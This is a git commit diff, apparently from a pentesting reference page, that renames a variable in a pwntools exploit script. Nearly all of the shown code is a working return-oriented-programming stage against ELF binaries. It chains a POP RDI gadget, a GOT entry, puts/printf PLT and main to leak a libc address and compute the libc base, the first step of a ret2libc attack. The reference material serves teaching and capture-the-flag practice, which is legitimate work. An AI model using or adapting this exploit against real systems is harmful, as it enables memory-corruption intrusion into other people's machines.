GitBook: [master] one page modified
This commit is contained in:
parent
307eb099ba
commit
bceb2bdadc
|
@ -62,10 +62,10 @@ if OFFSET == b"":
|
||||||
#### Find Gadgets ###
|
#### Find Gadgets ###
|
||||||
#####################
|
#####################
|
||||||
try:
|
try:
|
||||||
print_func = "puts"
|
libc_func = "puts"
|
||||||
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
|
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
|
||||||
except:
|
except:
|
||||||
print_func = "printf"
|
libc_func = "printf"
|
||||||
PUTS_PLT = ELF_LOADED.plt['printf']
|
PUTS_PLT = ELF_LOADED.plt['printf']
|
||||||
|
|
||||||
MAIN_PLT = ELF_LOADED.symbols['main']
|
MAIN_PLT = ELF_LOADED.symbols['main']
|
||||||
|
@ -97,9 +97,9 @@ def generate_payload_aligned(rop):
|
||||||
return payload1
|
return payload1
|
||||||
|
|
||||||
|
|
||||||
def get_addr(print_func):
|
def get_addr(libc_func):
|
||||||
FUNC_GOT = ELF_LOADED.got[print_func]
|
FUNC_GOT = ELF_LOADED.got[libc_func]
|
||||||
log.info(print_func + " GOT @ " + hex(FUNC_GOT))
|
log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
|
||||||
# Create rop chain
|
# Create rop chain
|
||||||
rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
|
rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
|
||||||
rop1 = generate_payload_aligned(rop1)
|
rop1 = generate_payload_aligned(rop1)
|
||||||
|
@ -117,11 +117,11 @@ def get_addr(print_func):
|
||||||
# Parse leaked address
|
# Parse leaked address
|
||||||
log.info(f"Len rop1: {len(rop1)}")
|
log.info(f"Len rop1: {len(rop1)}")
|
||||||
leak = u64(recieved.ljust(8, b"\x00"))
|
leak = u64(recieved.ljust(8, b"\x00"))
|
||||||
log.info(f"Leaked LIBC address, {print_func}: {hex(leak)}")
|
log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")
|
||||||
|
|
||||||
# Set lib base address
|
# Set lib base address
|
||||||
if LIBC:
|
if LIBC:
|
||||||
LIBC.address = leak - LIBC.symbols[print_func] #Save LIBC base
|
LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
|
||||||
log.info("LIBC base @ %s" % hex(LIBC.address))
|
log.info("LIBC base @ %s" % hex(LIBC.address))
|
||||||
|
|
||||||
# If not LIBC yet, stop here
|
# If not LIBC yet, stop here
|
||||||
|
@ -131,7 +131,7 @@ def get_addr(print_func):
|
||||||
|
|
||||||
return hex(leak)
|
return hex(leak)
|
||||||
|
|
||||||
get_addr(print_func) #Search for puts address in memmory to obtains LIBC base
|
get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|